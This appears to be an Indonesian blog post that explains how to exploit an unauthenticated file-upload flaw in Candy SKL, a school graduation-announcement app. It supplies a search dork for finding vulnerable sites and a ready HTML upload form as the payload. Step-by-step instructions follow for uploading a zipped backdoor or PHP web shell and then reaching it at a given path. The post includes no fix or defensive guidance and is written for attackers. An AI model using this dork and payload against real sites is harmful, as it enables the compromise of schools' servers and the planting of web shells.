Selain pembuatan aplikasi ujian online, CandyCBT juga meluncurkan aplikasi untuk pengumuman Kelulusan, sebagai pelengkap dari aplikasi ujian yang sudah disediakan oleh Candy CBT, yakni Candy SKL.
Tentu saja, aplikasi tidak mungkin terhindar dari yang namanya bug, bahkan meskipun itu aplikasi lama, apalagi yang baru diluncurkan. Candy SKL sudah terdapat bug yang cukup berbahaya, yakni CSRF File Upload yang tidak diotentikasi terlebih dahulu. Maka dari itu, penyerang dapat menyerang sisi fitur uploader ini.
Berikut ulasan mengenai cara eksploitasi bug tersebut pada Candy SKL.
Dork
intext:Candy SKL intitle:SKL - Candy School
Route
/admin/upload.php
Contoh Payload CSRF
<form action='http://target.site/admin/upload.php' method='post' enctype='multipart/form-data'>
<input type='file' name='zip_file' required='true' />
<button type='submit' name='btn_zip'>Upload</button>
</form>
Alur Eksploitasi
- Gunakan dork di atas jika kamu ingin mencari situs yang memiliki aplikasi Candy SKL
- Telusuri halaman route di atas, jika blank maka kemungkinan vulnerable terhadap serangan.
- Lakukan upload menggunakan payload CSRF untuk file kompresi tipe zip yang berisikan malware, entah itu backdoor maupun foto muka kamu yang jelek. (sertakan direktori awal, misalnya pada path
/mymalware/myphoto.phpjpeg
) - Tunggu loading, jika file sukses atau terupload maka akan muncul popup pesan Berhasil
- Sekarang kamu bisa akses file kamu di
http://target.site/admin/foto_siswa/[path_file]
contohnyahttp://target.site/admin/foto_siswa/myshell/d45h7.php